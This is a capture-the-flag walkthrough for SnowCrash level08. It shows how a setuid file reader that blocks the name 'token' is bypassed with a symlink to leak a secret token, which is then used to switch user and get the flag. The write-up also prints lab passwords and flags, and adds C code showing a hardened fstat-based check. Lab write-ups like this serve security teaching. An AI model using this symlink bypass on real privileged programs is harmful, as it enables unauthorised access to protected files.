# Level 08

## how to login

username: level08

password: fiumuikeil55xe9cu4dood66h

## Goal

run `getflag` as user `flag08`

## Actually doing something

```bash
level08@SnowCrash:~$ ll
total 28
dr-xr-x---+ 1 level08 level08 140 Mar 5 2016 ./
d--x--x--x 1 root users 340 Aug 30 2015 ../
-r-x------ 1 level08 level08 220 Apr 3 2012 .bash_logout*
-r-x------ 1 level08 level08 3518 Aug 30 2015 .bashrc*
-rwsr-s---+ 1 flag08 level08 8617 Mar 5 2016 level08*
-r-x------ 1 level08 level08 675 Apr 3 2012 .profile*
-rw------- 1 flag08 flag08 26 Mar 5 2016 token
```

Interesting: we have the usual setuid binary, but we also have a file we can't read, named `token`. I wonder if the flag is there.

Let's run the binary and see what happens:

```bash
level08@SnowCrash:~$ ./level08
./level08 [file to read]
level08@SnowCrash:~$ ./level08 token
You may not access 'token'
```

It is a little bit smart, so let's try to outsmart it by using symlinks:

```bash
level08@SnowCrash:~$ ln -s $(realpath token) /tmp/level08
level08@SnowCrash:~$ ./level08 /tmp/level08
quif5eloekouj29ke0vouxean
```

The old tale of checking the filename and not the actual file! We can now get the actual token with that password:

```bash
level08@SnowCrash:~$ su flag08 -c getflag
Password:
Check flag.Here is your token : 25749xKZ8L7DkSCwJkT9dyv6f
```
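
Why the name check fails and what a check on the opened file looks like, as an added example (not the level's real source and not part of the original write-up). `name_check_allows` is an assumed reconstruction of the weak check, and `open_for_caller` with its "caller must own the file" policy is a hypothetical hardened replacement.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L   /* for O_NOFOLLOW */
#endif
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed shape of the weak check: it only inspects the name it was given. */
int name_check_allows(const char *path)
{
    return strstr(path, "token") == NULL;
}

/* Hardened form: open first (refusing a symlink as the final component),
 * then decide from the opened file itself. Returns an fd or -1. */
int open_for_caller(const char *path, uid_t caller)
{
    struct stat st;
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);
    if (fd < 0)
        return -1;
    /* fstat() describes the inode behind fd, so no alias of the path matters. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != caller) {
        close(fd);
        return -1;
    }
    return fd;
}

int main(int argc, char **argv)
{
    char buf[1024];
    ssize_t n;
    if (argc != 2) {
        fprintf(stderr, "%s [file to read]\n", argv[0]);
        return 1;
    }
    /* getuid() is the real (invoking) user, not the setuid owner. */
    int fd = open_for_caller(argv[1], getuid());
    if (fd < 0) {
        fprintf(stderr, "You may not access '%s'\n", argv[1]);
        return 1;
    }
    while ((n = read(fd, buf, sizeof buf)) > 0)
        fwrite(buf, 1, (size_t)n, stdout);
    close(fd);
    return 0;
}
```

The ownership test on the file descriptor is what carries the decision; `O_NOFOLLOW` only covers the last path component, so it is a second layer rather than the fix on its own.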